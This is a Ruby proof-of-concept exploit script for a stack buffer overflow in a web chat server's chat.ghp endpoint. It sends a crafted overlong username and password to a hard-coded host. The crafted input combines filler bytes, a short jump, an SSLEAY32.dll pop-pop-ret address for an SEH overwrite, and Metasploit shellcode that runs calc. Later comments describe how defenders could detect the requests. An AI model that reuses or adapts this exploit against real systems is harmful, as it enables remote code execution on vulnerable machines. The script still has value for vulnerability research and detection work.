#!/usr/bin/ruby
# Author: John Babio
# Tested on: [Windows XP Sp3 Eng]

require 'net/http'
require 'uri'
require 'socket'


# Proof-of-concept payload pieces. Everything below is a fixed byte string;
# nothing is computed at runtime, so the script either matches the exact build
# the author tested (see the header) or does nothing useful.
jmp = "\xeb\x06\x90\x90"   # author-labelled short jump followed by two NOP bytes
# NOTE(review): "\01" is an octal escape (same byte as "\x01"); the mixed
# notation is easy to misread but the value is what the author intended.
ppr = "\xa2\xb9\01\x10" #SSLEAY32.dll pop ebx, pop ebp, ret

#win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com

# Metasploit-generated payload per the comment above: launches calc as a
# harmless demonstration. Treated as opaque bytes; nothing here decodes it.
shellcode = "\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x86" +
"\x49\xae\x6a\x83\xeb\xfc\xe2\xf4\x7a\xa1\xea\x6a\x86\x49\x25\x2f" +
"\xba\xc2\xd2\x6f\xfe\x48\x41\xe1\xc9\x51\x25\x35\xa6\x48\x45\x23" +
"\x0d\x7d\x25\x6b\x68\x78\x6e\xf3\x2a\xcd\x6e\x1e\x81\x88\x64\x67" +
"\x87\x8b\x45\x9e\xbd\x1d\x8a\x6e\xf3\xac\x25\x35\xa2\x48\x45\x0c" +
"\x0d\x45\xe5\xe1\xd9\x55\xaf\x81\x0d\x55\x25\x6b\x6d\xc0\xf2\x4e" +
"\x82\x8a\x9f\xaa\xe2\xc2\xee\x5a\x03\x89\xd6\x66\x0d\x09\xa2\xe1" +
"\xf6\x55\x03\xe1\xee\x41\x45\x63\x0d\xc9\x1e\x6a\x86\x49\x25\x02" +
"\xba\x16\x9f\x9c\xe6\x1f\x27\x92\x05\x89\xd5\x3a\xee\xb9\x24\x6e" +
"\xd9\x21\x36\x94\x0c\x47\xf9\x95\x61\x2a\xcf\x06\xe5\x49\xae\x6a" 

# Request payload: 216 filler bytes, then the jump, the SSLEAY32.dll address
# and the shellcode. Filler length and address are hard-coded, so the layout
# is tied to the build named in the header. From a defender's view the
# observable is a request to chat.ghp whose username and password parameters
# are several hundred bytes of mostly non-printable data — an easy signature
# for WAF/IDS rules and web-server log review.
buffer = "\x41" * 216 + jmp + ppr + shellcode

# Target host is hard-coded; URI.parse supplies port 80 since none is given.
url = URI.parse('http://10.10.99.12')
# The buffer goes into the query string without percent-encoding, so the raw
# bytes are sent as-is; whether Net::HTTP accepts such a path is Ruby-version
# dependent and not verified here. There is no rescue, so a refused connection
# or a timeout raises and aborts the script before `puts`.
res = Net::HTTP.start(url.host, url.port) {|http|
http.get('/chat.ghp?username=' +buffer+ '&password=' +buffer+ '&room=1&sex=2')
}
puts res.body